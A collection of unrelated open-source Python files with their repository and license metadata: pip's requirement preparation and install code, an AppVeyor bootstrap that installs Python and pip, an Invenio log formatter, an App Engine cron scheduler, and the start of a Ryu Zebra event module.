if self.download_dir:
self.download_dir = expanduser(self.download_dir)
if os.path.exists(self.download_dir):
return True
else:
logger.critical('Could not find download directory')
raise InstallationError(
"Could not find or access download directory '%s'"
% display_path(self.download_dir))
return False
def get_requirement(self, project_name):
for name in project_name, project_name.lower():
if name in self.requirements:
return self.requirements[name]
if name in self.requirement_aliases:
return self.requirements[self.requirement_aliases[name]]
raise KeyError("No project with the name %r" % project_name)
def uninstall(self, auto_confirm=False):
for req in self.requirements.values():
if req.constraint:
continue
req.uninstall(auto_confirm=auto_confirm)
req.commit_uninstall()
def prepare_files(self, finder):
"""
Prepare process. Create temp directories, download and/or unpack files.
"""
# make the wheelhouse
if self.wheel_download_dir:
ensure_dir(self.wheel_download_dir)
# If any top-level requirement has a hash specified, enter
# hash-checking mode, which requires hashes from all.
root_reqs = self.unnamed_requirements + self.requirements.values()
require_hashes = (self.require_hashes or
any(req.has_hash_options for req in root_reqs))
if require_hashes and self.as_egg:
raise InstallationError(
'--egg is not allowed with --require-hashes mode, since it '
'delegates dependency resolution to setuptools and could thus '
'result in installation of unhashed packages.')
# Actually prepare the files, and collect any exceptions. Most hash
# exceptions cannot be checked ahead of time, because
# req.populate_link() needs to be called before we can make decisions
# based on link type.
discovered_reqs = []
hash_errors = HashErrors()
for req in chain(root_reqs, discovered_reqs):
try:
discovered_reqs.extend(self._prepare_file(
finder,
req,
require_hashes=require_hashes,
ignore_dependencies=self.ignore_dependencies))
except HashError as exc:
exc.req = req
hash_errors.append(exc)
if hash_errors:
raise hash_errors
def _check_skip_installed(self, req_to_install, finder):
"""Check if req_to_install should be skipped.
This will check if the req is installed, and whether we should upgrade
or reinstall it, taking into account all the relevant user options.
After calling this req_to_install will only have satisfied_by set to
None if the req_to_install is to be upgraded/reinstalled etc. Any
other value will be a dist recording the current thing installed that
satisfies the requirement.
Note that for vcs urls and the like we can't assess skipping in this
routine - we simply identify that we need to pull the thing down,
then later on it is pulled down and introspected to assess upgrade/
reinstalls etc.
:return: A text reason for why it was skipped, or None.
"""
# Check whether to upgrade/reinstall this req or not.
req_to_install.check_if_exists()
if req_to_install.satisfied_by:
skip_reason = 'satisfied (use --upgrade to upgrade)'
if self.upgrade:
best_installed = False
# For link based requirements we have to pull the
# tree down and inspect to assess the version #, so
# its handled way down.
if not (self.force_reinstall or req_to_install.link):
try:
finder.find_requirement(req_to_install, self.upgrade)
except BestVersionAlreadyInstalled:
skip_reason = 'up-to-date'
best_installed = True
except DistributionNotFound:
# No distribution found, so we squash the
# error - it will be raised later when we
# re-try later to do the install.
# Why don't we just raise here?
pass
if not best_installed:
# don't uninstall conflict if user install and
# conflict is not user install
if not (self.use_user_site and not
dist_in_usersite(req_to_install.satisfied_by)):
req_to_install.conflicts_with = \
req_to_install.satisfied_by
req_to_install.satisfied_by = None
return skip_reason
else:
return None
def _prepare_file(self,
finder,
req_to_install,
require_hashes=False,
ignore_dependencies=False):
"""Prepare a single requirements file.
:return: A list of additional InstallRequirements to also install.
"""
# Tell user what we are doing for this requirement:
# obtain (editable), skipping, processing (local url), collecting
# (remote url or package name)
if req_to_install.constraint or req_to_install.prepared:
return []
req_to_install.prepared = True
# ###################### #
# # print log messages # #
# ###################### #
if req_to_install.editable:
logger.info('Obtaining %s', req_to_install)
else:
# satisfied_by is only evaluated by calling _check_skip_installed,
# so it must be None here.
assert req_to_install.satisfied_by is None
if not self.ignore_installed:
skip_reason = self._check_skip_installed(
req_to_install, finder)
if req_to_install.satisfied_by:
assert skip_reason is not None, (
'_check_skip_installed returned None but '
'req_to_install.satisfied_by is set to %r'
% (req_to_install.satisfied_by,))
logger.info(
'Requirement already %s: %s', skip_reason,
req_to_install)
else:
if (req_to_install.link and
req_to_install.link.scheme == 'file'):
path = url_to_path(req_to_install.link.url)
logger.info('Processing %s', display_path(path))
else:
logger.info('Collecting %s', req_to_install)
with indent_log():
# ################################ #
# # vcs update or unpack archive # #
# ################################ #
if req_to_install.editable:
if require_hashes:
raise InstallationError(
'The editable requirement %s cannot be installed when '
'requiring hashes, because there is no single file to '
'hash.' % req_to_install)
req_to_install.ensure_has_source_dir(self.src_dir)
req_to_install.update_editable(not self.is_download)
abstract_dist = make_abstract_dist(req_to_install)
abstract_dist.prep_for_dist()
if self.is_download:
req_to_install.archive(self.download_dir)
elif req_to_install.satisfied_by:
if require_hashes:
logger.debug(
'Since it is already installed, we are trusting this '
'package without checking its hash. To ensure a '
'completely repeatable environment, install into an '
'empty virtualenv.')
abstract_dist = Installed(req_to_install)
else:
# @@ if filesystem packages are not marked
# editable in a req, a non deterministic error
# occurs when the script attempts to unpack the
# build directory
req_to_install.ensure_has_source_dir(self.build_dir)
# If a checkout exists, it's unwise to keep going. version
# inconsistencies are logged later, but do not fail the
# installation.
# FIXME: this won't upgrade when there's an existing
# package unpacked in `req_to_install.source_dir`
if os.path.exists(
os.path.join(req_to_install.source_dir, 'setup.py')):
raise PreviousBuildDirError(
"pip can't proceed with requirements '%s' due to a"
" pre-existing build directory (%s). This is "
"likely due to a previous installation that failed"
". pip is being responsible and not assuming it "
"can delete this. Please delete it and try again."
% (req_to_install, req_to_install.source_dir)
)
req_to_install.populate_link(
finder, self.upgrade, require_hashes)
# We can't hit this spot and have populate_link return None.
# req_to_install.satisfied_by is None here (because we're
# guarded) and upgrade has no impact except when satisfied_by
# is not None.
# Then inside find_requirement existing_applicable -> False
# If no new versions are found, DistributionNotFound is raised,
# otherwise a result is guaranteed.
assert req_to_install.link
link = req_to_install.link
# Now that we have the real link, we can tell what kind of
# requirements we have and raise some more informative errors
# than otherwise. (For example, we can raise VcsHashUnsupported
# for a VCS URL rather than HashMissing.)
if require_hashes:
# We could check these first 2 conditions inside
# unpack_url and save repetition of conditions, but then
# we would report less-useful error messages for
# unhashable requirements, complaining that there's no
# hash provided.
if is_vcs_url(link):
raise VcsHashUnsupported()
elif is_file_url(link) and is_dir_url(link):
raise DirectoryUrlHashUnsupported()
if (not req_to_install.original_link and
not req_to_install.is_pinned):
# Unpinned packages are asking for trouble when a new
# version is uploaded. This isn't a security check, but
# it saves users a surprising hash mismatch in the
# future.
#
# file:/// URLs aren't pinnable, so don't complain
# about them not being pinned.
raise HashUnpinned()
hashes = req_to_install.hashes(
trust_internet=not require_hashes)
if require_hashes and not hashes:
# Known-good hashes are missing for this requirement, so
# shim it with a facade object that will provoke hash
# computation and then raise a HashMissing exception
# showing the user what the hash should be.
hashes = MissingHashes()
try:
download_dir = self.download_dir
# We always delete unpacked sdists after pip ran.
autodelete_unpacked = True
if req_to_install.link.is_wheel \
and self.wheel_download_dir:
# when doing 'pip wheel` we download wheels to a
# dedicated dir.
download_dir = self.wheel_download_dir
if req_to_install.link.is_wheel:
if download_dir:
# When downloading, we only unpack wheels to get
# metadata.
autodelete_unpacked = True
else:
# When installing a wheel, we use the unpacked
# wheel.
autodelete_unpacked = False
unpack_url(
req_to_install.link, req_to_install.source_dir,
download_dir, autodelete_unpacked,
session=self.session, hashes=hashes)
except requests.HTTPError as exc:
logger.critical(
'Could not install requirement %s because '
'of error %s',
req_to_install,
exc,
)
raise InstallationError(
'Could not install requirement %s because '
'of HTTP error %s for URL %s' %
(req_to_install, exc, req_to_install.link)
)
abstract_dist = make_abstract_dist(req_to_install)
abstract_dist.prep_for_dist()
if self.is_download:
# Make a .zip of the source_dir we already created.
if req_to_install.link.scheme in vcs.all_schemes:
req_to_install.archive(self.download_dir)
# req_to_install.req is only avail after unpack for URL
# pkgs repeat check_if_exists to uninstall-on-upgrade
# (#14)
if not self.ignore_installed:
req_to_install.check_if_exists()
if req_to_install.satisfied_by:
if self.upgrade or self.ignore_installed:
# don't uninstall conflict if user install and
# conflict is not user install
if not (self.use_user_site and not
dist_in_usersite(
req_to_install.satisfied_by)):
req_to_install.conflicts_with = \
req_to_install.satisfied_by
req_to_install.satisfied_by = None
else:
logger.info(
'Requirement already satisfied (use '
'--upgrade to upgrade): %s',
req_to_install,
)
# ###################### #
# # parse dependencies # #
# ###################### #
dist = abstract_dist.dist(finder)
more_reqs = []
def add_req(subreq):
sub_install_req = InstallRequirement(
str(subreq),
req_to_install,
isolated=self.isolated,
wheel_cache=self._wheel_cache,
)
more_reqs.extend(self.add_requirement(
sub_install_req, req_to_install.name))
# We add req_to_install before its dependencies, so that we
# can refer to it when adding dependencies.
if not self.has_requirement(req_to_install.name):
# 'unnamed' requirements will get added here
self.add_requirement(req_to_install, None)
if not ignore_dependencies:
if (req_to_install.extras):
logger.debug(
"Installing extra requirements: %r",
','.join(req_to_install.extras),
)
missing_requested = sorted(
set(req_to_install.extras) - set(dist.extras)
)
for missing in missing_requested:
logger.warning(
'%s does not provide the extra \'%s\'',
dist, missing
)
available_requested = sorted(
set(dist.extras) & set(req_to_install.extras)
)
for subreq in dist.requires(available_requested):
add_req(subreq)
# cleanup tmp src
self.reqs_to_cleanup.append(req_to_install)
if not req_to_install.editable and not req_to_install.satisfied_by:
# XXX: --no-install leads this to report 'Successfully
# downloaded' for only non-editable reqs, even though we took
# action on them.
self.successfully_downloaded.append(req_to_install)
return more_reqs
def cleanup_files(self):
"""Clean up files, remove builds."""
logger.debug('Cleaning up...')
with indent_log():
for req in self.reqs_to_cleanup:
req.remove_temporary_source()
def _to_install(self):
"""Create the installation order.
The installation order is topological - requirements are installed
before the requiring thing. We break cycles at an arbitrary point,
and make no other guarantees.
"""
# The current implementation, which we may change at any point
# installs the user specified things in the order given, except when
# dependencies must come earlier to achieve topological order.
order = []
ordered_reqs = set()
def schedule(req):
if req.satisfied_by or req in ordered_reqs:
return
if req.constraint:
return
ordered_reqs.add(req)
for dep in self._dependencies[req]:
schedule(dep)
order.append(req)
for install_req in self.requirements.values():
schedule(install_req)
return order
def install(self, install_options, global_options=(), *args, **kwargs):
"""
Install everything in this set (after having downloaded and unpacked
the packages)
"""
to_install = self._to_install()
if to_install:
logger.info(
'Installing collected packages: %s',
', '.join([req.name for req in to_install]),
)
with indent_log():
for requirement in to_install:
if requirement.conflicts_with:
logger.info(
'Found existing installation: %s',
requirement.conflicts_with,
)
with indent_log():
requirement.uninstall(auto_confirm=True)
try:
requirement.install(
install_options,
global_options,
*args,
**kwargs
)
except:
# if install did not succeed, rollback previous uninstall
if (requirement.conflicts_with and not
requirement.install_succeeded):
requirement.rollback_uninstall()
raise
else:
if (requirement.conflicts_with and
requirement.install_succeeded):
requirement.commit_uninstall()
requirement.remove_temporary_source()
self.successfully_installed = to_install
|
gpl-2.0
|
ssov/python-calc
|
ci/appveyor-bootstrap.py
|
9
|
4444
|
"""
AppVeyor will at least have few Pythons around so there's no point of implementing a bootstrapper in PowerShell.
This is a port of https://github.com/pypa/python-packaging-user-guide/blob/master/source/code/install.ps1
with various fixes and improvements that just weren't feasible to implement in PowerShell.
"""
from __future__ import print_function
from os import environ
from os.path import exists
from subprocess import check_call
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
BASE_URL = "https://www.python.org/ftp/python/"
GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
GET_PIP_PATH = "C:\get-pip.py"
URLS = {
("2.6", "64"): BASE_URL + "2.6.6/python-2.6.6.amd64.msi",
("2.6", "32"): BASE_URL + "2.6.6/python-2.6.6.msi",
("2.7", "64"): BASE_URL + "2.7.10/python-2.7.10.amd64.msi",
("2.7", "32"): BASE_URL + "2.7.10/python-2.7.10.msi",
# NOTE: no .msi installer for 3.3.6
("3.3", "64"): BASE_URL + "3.3.3/python-3.3.3.amd64.msi",
("3.3", "32"): BASE_URL + "3.3.3/python-3.3.3.msi",
("3.4", "64"): BASE_URL + "3.4.3/python-3.4.3.amd64.msi",
("3.4", "32"): BASE_URL + "3.4.3/python-3.4.3.msi",
("3.5", "64"): BASE_URL + "3.5.0/python-3.5.0-amd64.exe",
("3.5", "32"): BASE_URL + "3.5.0/python-3.5.0.exe",
}
INSTALL_CMD = {
# Commands are allowed to fail only if they are not the last command. Eg: uninstall (/x) allowed to fail.
"2.6": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"2.7": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.3": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.4": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.5": [["{path}", "/quiet", "TargetDir={home}"]],
}
def download_file(url, path):
print("Downloading: {} (into {})".format(url, path))
progress = [0, 0]
def report(count, size, total):
progress[0] = count * size
if progress[0] - progress[1] > 1000000:
progress[1] = progress[0]
print("Downloaded {:,}/{:,} ...".format(progress[1], total))
dest, _ = urlretrieve(url, path, reporthook=report)
return dest
def install_python(version, arch, home):
print("Installing Python", version, "for", arch, "bit architecture to", home)
if exists(home):
return
path = download_python(version, arch)
print("Installing", path, "to", home)
success = False
for cmd in INSTALL_CMD[version]:
cmd = [part.format(home=home, path=path) for part in cmd]
print("Running:", " ".join(cmd))
try:
check_call(cmd)
except Exception as exc:
print("Failed command", cmd, "with:", exc)
if exists("install.log"):
with open("install.log") as fh:
print(fh.read())
else:
success = True
if success:
print("Installation complete!")
else:
print("Installation failed")
def download_python(version, arch):
for _ in range(3):
try:
return download_file(URLS[version, arch], "installer.exe")
except Exception as exc:
print("Failed to download:", exc)
print("Retrying ...")
def install_pip(home):
pip_path = home + "/Scripts/pip.exe"
python_path = home + "/python.exe"
if exists(pip_path):
print("pip already installed.")
else:
print("Installing pip...")
download_file(GET_PIP_URL, GET_PIP_PATH)
print("Executing:", python_path, GET_PIP_PATH)
check_call([python_path, GET_PIP_PATH])
def install_packages(home, *packages):
cmd = [home + "/Scripts/pip.exe", "install"]
cmd.extend(packages)
check_call(cmd)
if __name__ == "__main__":
install_python(environ['PYTHON_VERSION'], environ['PYTHON_ARCH'], environ['PYTHON_HOME'])
install_pip(environ['PYTHON_HOME'])
install_packages(environ['PYTHON_HOME'], "setuptools>=18.0.1", "wheel", "tox", "virtualenv>=13.1.0")
|
bsd-2-clause
|
jirikuncar/invenio-upgrader
|
invenio_upgrader/logging.py
|
20
|
2014
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2012, 2013, 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import absolute_import
import logging
class InvenioUpgraderLogFormatter(logging.Formatter):
"""
Custom logging formatter allowing different log formats for different
error levels.
"""
def __init__(self, fmt, **overwrites):
self.fmt = fmt
self.overwrites = overwrites
self.prefix = ''
self.plugin_id = ''
logging.Formatter.__init__(self, fmt)
def get_level_fmt(self, level):
""" Get format for log level """
key = None
if level == logging.DEBUG:
key = 'debug'
elif level == logging.INFO:
key = 'info'
elif level == logging.WARNING:
key = 'warning'
elif level == logging.ERROR:
key = 'error'
elif level == logging.CRITICAL:
key = 'critical'
return self.overwrites.get(key, self.fmt)
def format(self, record):
""" Format log record """
format_orig = self._fmt
self._fmt = self.get_level_fmt(record.levelno)
record.prefix = self.prefix
record.plugin_id = self.plugin_id
result = logging.Formatter.format(self, record)
self._fmt = format_orig
return result
|
gpl-2.0
|
edwardzhou1980/bite-project
|
deps/gdata-python-client/samples/oauth/oauth_on_appengine/appengine_utilities/cron.py
|
129
|
18386
|
"""
Copyright (c) 2008, appengine-utilities project
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the appengine-utilities project nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os
import cgi
import re
import datetime
import pickle
from google.appengine.ext import db
from google.appengine.api import urlfetch
from google.appengine.api import memcache
APPLICATION_PORT = '8080'
CRON_PORT = '8081'
class _AppEngineUtilities_Cron(db.Model):
"""
Model for the tasks in the datastore. This contains the scheduling and
url information, as well as a field that sets the next time the instance
should run.
"""
cron_entry = db.StringProperty()
next_run = db.DateTimeProperty()
cron_compiled = db.BlobProperty()
url = db.LinkProperty()
class Cron(object):
"""
Cron is a scheduling utility built for appengine, modeled after
crontab for unix systems. While true scheduled tasks are not
possible within the Appengine environment currently, this
is an attmempt to provide a request based alternate. You
configure the tasks in an included interface, and the import
the class on any request you want capable of running tasks.
On each request where Cron is imported, the list of tasks
that need to be run will be pulled and run. A task is a url
within your application. It's important to make sure that these
requests fun quickly, or you could risk timing out the actual
request.
See the documentation for more information on configuring
your application to support Cron and setting up tasks.
"""
def __init__(self):
# Check if any tasks need to be run
query = _AppEngineUtilities_Cron.all()
query.filter('next_run <= ', datetime.datetime.now())
results = query.fetch(1000)
if len(results) > 0:
one_second = datetime.timedelta(seconds = 1)
before = datetime.datetime.now()
for r in results:
if re.search(':' + APPLICATION_PORT, r.url):
r.url = re.sub(':' + APPLICATION_PORT, ':' + CRON_PORT, r.url)
#result = urlfetch.fetch(r.url)
diff = datetime.datetime.now() - before
if int(diff.seconds) < 1:
if memcache.add(str(r.key), "running"):
result = urlfetch.fetch(r.url)
r.next_run = self._get_next_run(pickle.loads(r.cron_compiled))
r.put()
memcache.delete(str(r.key))
else:
break
def add_cron(self, cron_string):
cron = cron_string.split(" ")
if len(cron) is not 6:
raise ValueError, 'Invalid cron string. Format: * * * * * url'
cron = {
'min': cron[0],
'hour': cron[1],
'day': cron[2],
'mon': cron[3],
'dow': cron[4],
'url': cron[5],
}
cron_compiled = self._validate_cron(cron)
next_run = self._get_next_run(cron_compiled)
cron_entry = _AppEngineUtilities_Cron()
cron_entry.cron_entry = cron_string
cron_entry.next_run = next_run
cron_entry.cron_compiled = pickle.dumps(cron_compiled)
cron_entry.url = cron["url"]
cron_entry.put()
def _validate_cron(self, cron):
"""
Parse the field to determine whether it is an integer or lists,
also converting strings to integers where necessary. If passed bad
values, raises a ValueError.
"""
parsers = {
'dow': self._validate_dow,
'mon': self._validate_mon,
'day': self._validate_day,
'hour': self._validate_hour,
'min': self._validate_min,
'url': self. _validate_url,
}
for el in cron:
parse = parsers[el]
cron[el] = parse(cron[el])
return cron
def _validate_type(self, v, t):
"""
Validates that the number (v) passed is in the correct range for the
type (t). Raise ValueError, if validation fails.
Valid ranges:
day of week = 0-7
month = 1-12
day = 1-31
hour = 0-23
minute = 0-59
All can * which will then return the range for that entire type.
"""
if t == "dow":
if v >= 0 and v <= 7:
return [v]
elif v == "*":
return "*"
else:
raise ValueError, "Invalid day of week."
elif t == "mon":
if v >= 1 and v <= 12:
return [v]
elif v == "*":
return range(1, 12)
else:
raise ValueError, "Invalid month."
elif t == "day":
if v >= 1 and v <= 31:
return [v]
elif v == "*":
return range(1, 31)
else:
raise ValueError, "Invalid day."
elif t == "hour":
if v >= 0 and v <= 23:
return [v]
elif v == "*":
return range(0, 23)
else:
raise ValueError, "Invalid hour."
elif t == "min":
if v >= 0 and v <= 59:
return [v]
elif v == "*":
return range(0, 59)
else:
raise ValueError, "Invalid minute."
def _validate_list(self, l, t):
"""
Validates a crontab list. Lists are numerical values seperated
by a comma with no spaces. Ex: 0,5,10,15
Arguments:
l: comma seperated list of numbers
t: type used for validation, valid values are
dow, mon, day, hour, min
"""
elements = l.split(",")
return_list = []
# we have a list, validate all of them
for e in elements:
if "-" in e:
return_list.extend(self._validate_range(e, t))
else:
try:
v = int(e)
self._validate_type(v, t)
return_list.append(v)
except:
raise ValueError, "Names are not allowed in lists."
# return a list of integers
return return_list
def _validate_range(self, r, t):
"""
Validates a crontab range. Ranges are 2 numerical values seperated
by a dash with no spaces. Ex: 0-10
Arguments:
r: dash seperated list of 2 numbers
t: type used for validation, valid values are
dow, mon, day, hour, min
"""
elements = r.split('-')
# a range should be 2 elements
if len(elements) is not 2:
raise ValueError, "Invalid range passed: " + str(r)
# validate the minimum and maximum are valid for the type
for e in elements:
self._validate_type(int(e), t)
# return a list of the numbers in the range.
# +1 makes sure the end point is included in the return value
return range(int(elements[0]), int(elements[1]) + 1)
def _validate_step(self, s, t):
"""
Validates a crontab step. Steps are complicated. They can
be based on a range 1-10/2 or just step through all valid
*/2. When parsing times you should always check for step first
and see if it has a range or not, before checking for ranges because
this will handle steps of ranges returning the final list. Steps
of lists is not supported.
Arguments:
s: slash seperated string
t: type used for validation, valid values are
dow, mon, day, hour, min
"""
elements = s.split('/')
# a range should be 2 elements
if len(elements) is not 2:
raise ValueError, "Invalid step passed: " + str(s)
try:
step = int(elements[1])
except:
raise ValueError, "Invalid step provided " + str(s)
r_list = []
# if the first element is *, use all valid numbers
if elements[0] is "*" or elements[0] is "":
r_list.extend(self._validate_type('*', t))
# check and see if there is a list of ranges
elif "," in elements[0]:
ranges = elements[0].split(",")
for r in ranges:
# if it's a range, we need to manage that
if "-" in r:
r_list.extend(self._validate_range(r, t))
else:
try:
r_list.extend(int(r))
except:
raise ValueError, "Invalid step provided " + str(s)
elif "-" in elements[0]:
r_list.extend(self._validate_range(elements[0], t))
return range(r_list[0], r_list[-1] + 1, step)
def _validate_dow(self, dow):
"""
"""
# if dow is * return it. This is for date parsing where * does not mean
# every day for crontab entries.
if dow is "*":
return dow
days = {
'mon': 1,
'tue': 2,
'wed': 3,
'thu': 4,
'fri': 5,
'sat': 6,
# per man crontab sunday can be 0 or 7.
'sun': [0, 7],
}
if dow in days:
dow = days[dow]
return [dow]
# if dow is * return it. This is for date parsing where * does not mean
# every day for crontab entries.
elif dow is "*":
return dow
elif "/" in dow:
return(self._validate_step(dow, "dow"))
elif "," in dow:
return(self._validate_list(dow, "dow"))
elif "-" in dow:
return(self._validate_range(dow, "dow"))
else:
valid_numbers = range(0, 8)
if not int(dow) in valid_numbers:
raise ValueError, "Invalid day of week " + str(dow)
else:
return [int(dow)]
def _validate_mon(self, mon):
months = {
'jan': 1,
'feb': 2,
'mar': 3,
'apr': 4,
'may': 5,
'jun': 6,
'jul': 7,
'aug': 8,
'sep': 9,
'oct': 10,
'nov': 11,
'dec': 12,
}
if mon in months:
mon = months[mon]
return [mon]
elif mon is "*":
return range(1, 13)
elif "/" in mon:
return(self._validate_step(mon, "mon"))
elif "," in mon:
return(self._validate_list(mon, "mon"))
elif "-" in mon:
return(self._validate_range(mon, "mon"))
else:
valid_numbers = range(1, 13)
if not int(mon) in valid_numbers:
raise ValueError, "Invalid month " + str(mon)
else:
return [int(mon)]
def _validate_day(self, day):
if day is "*":
return range(1, 32)
elif "/" in day:
return(self._validate_step(day, "day"))
elif "," in day:
return(self._validate_list(day, "day"))
elif "-" in day:
return(self._validate_range(day, "day"))
else:
valid_numbers = range(1, 31)
if not int(day) in valid_numbers:
raise ValueError, "Invalid day " + str(day)
else:
return [int(day)]
def _validate_hour(self, hour):
if hour is "*":
return range(0, 24)
elif "/" in hour:
return(self._validate_step(hour, "hour"))
elif "," in hour:
return(self._validate_list(hour, "hour"))
elif "-" in hour:
return(self._validate_range(hour, "hour"))
else:
valid_numbers = range(0, 23)
if not int(hour) in valid_numbers:
raise ValueError, "Invalid hour " + str(hour)
else:
return [int(hour)]
def _validate_min(self, min):
if min is "*":
return range(0, 60)
elif "/" in min:
return(self._validate_step(min, "min"))
elif "," in min:
return(self._validate_list(min, "min"))
elif "-" in min:
return(self._validate_range(min, "min"))
else:
valid_numbers = range(0, 59)
if not int(min) in valid_numbers:
raise ValueError, "Invalid min " + str(min)
else:
return [int(min)]
def _validate_url(self, url):
# kludge for issue 842, right now we use request headers
# to set the host.
if url[0] is not "/":
url = "/" + url
url = 'http://' + str(os.environ['HTTP_HOST']) + url
return url
# content below is for when that issue gets fixed
#regex = re.compile("^(http|https):\/\/([a-z0-9-]\.+)*", re.IGNORECASE)
#if regex.match(url) is not None:
# return url
#else:
# raise ValueError, "Invalid url " + url
def _calc_month(self, next_run, cron):
while True:
if cron["mon"][-1] < next_run.month:
next_run = next_run.replace(year=next_run.year+1, \
month=cron["mon"][0], \
day=1,hour=0,minute=0)
else:
if next_run.month in cron["mon"]:
return next_run
else:
one_month = datetime.timedelta(months=1)
next_run = next_run + one_month
def _calc_day(self, next_run, cron):
# start with dow as per cron if dow and day are set
# then dow is used if it comes before day. If dow
# is *, then ignore it.
if str(cron["dow"]) != str("*"):
# convert any integers to lists in order to easily compare values
m = next_run.month
while True:
if next_run.month is not m:
next_run = next_run.replace(hour=0, minute=0)
next_run = self._calc_month(next_run, cron)
if next_run.weekday() in cron["dow"] or next_run.day in cron["day"]:
return next_run
else:
one_day = datetime.timedelta(days=1)
next_run = next_run + one_day
else:
m = next_run.month
while True:
if next_run.month is not m:
next_run = next_run.replace(hour=0, minute=0)
next_run = self._calc_month(next_run, cron)
# if cron["dow"] is next_run.weekday() or cron["day"] is next_run.day:
if next_run.day in cron["day"]:
return next_run
else:
one_day = datetime.timedelta(days=1)
next_run = next_run + one_day
def _calc_hour(self, next_run, cron):
m = next_run.month
d = next_run.day
while True:
if next_run.month is not m:
next_run = next_run.replace(hour=0, minute=0)
next_run = self._calc_month(next_run, cron)
if next_run.day is not d:
next_run = next_run.replace(hour=0)
next_run = self._calc_day(next_run, cron)
if next_run.hour in cron["hour"]:
return next_run
else:
m = next_run.month
d = next_run.day
one_hour = datetime.timedelta(hours=1)
next_run = next_run + one_hour
def _calc_minute(self, next_run, cron):
one_minute = datetime.timedelta(minutes=1)
m = next_run.month
d = next_run.day
h = next_run.hour
while True:
if next_run.month is not m:
next_run = next_run.replace(minute=0)
next_run = self._calc_month(next_run, cron)
if next_run.day is not d:
next_run = next_run.replace(minute=0)
next_run = self._calc_day(next_run, cron)
if next_run.hour is not h:
next_run = next_run.replace(minute=0)
next_run = self._calc_day(next_run, cron)
if next_run.minute in cron["min"]:
return next_run
else:
m = next_run.month
d = next_run.day
h = next_run.hour
next_run = next_run + one_minute
def _get_next_run(self, cron):
one_minute = datetime.timedelta(minutes=1)
# go up 1 minute because it shouldn't happen right when added
now = datetime.datetime.now() + one_minute
next_run = now.replace(second=0, microsecond=0)
# start with month, which will also help calculate year
next_run = self._calc_month(next_run, cron)
next_run = self._calc_day(next_run, cron)
next_run = self._calc_hour(next_run, cron)
next_run = self._calc_minute(next_run, cron)
return next_run
|
apache-2.0
|
fujita/ryu
|
ryu/services/protocols/zebra/event.py
|
4
|
3530
|
# Copyright (C) 2017 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Events for Zebra protocol service.
"""
import inspect
import logging
from ryu import utils
from ryu.controller import event
from ryu.lib.packet import zebra
LOG = logging.getLogger(__name__)
MOD = utils.import_module(__name__)
ZEBRA_EVENTS = []
class EventZebraBase(event.EventBase):
"""
The base class for Zebra protocol service event class.
The subclasses have at least ``zclient`` and the same attributes with
:py:class: `ryu.lib.packet.zebra.ZebraMessage`.
``zclient`` is an instance of Zebra client class. See
:py:class: `ryu.services.protocols.zebra.client.zclient.ZClient` or
:py:class: `ryu.services.protocols.zebra.server.zserver.ZClient`.
The subclasses are named as::
``"Event" + <Zebra message body class name>``
For Example, if the service received ZEBRA_INTERFACE_ADD message,
the body class should be
:py:class: `ryu.lib.packet.zebra.ZebraInterfaceAdd`, then the event
class will be named as::
"Event" + "ZebraInterfaceAdd" = "EventZebraInterfaceAdd"
``msg`` argument must be an instance of
:py:class: `ryu.lib.packet.zebra.ZebraMessage` and used to extract the
attributes for the event classes.
"""
def __init__(self, zclient, msg):
super(EventZebraBase, self).__init__()
assert isinstance(msg, zebra.ZebraMessage)
self.__dict__ = msg.__dict__
self.zclient = zclient
def __repr__(self):
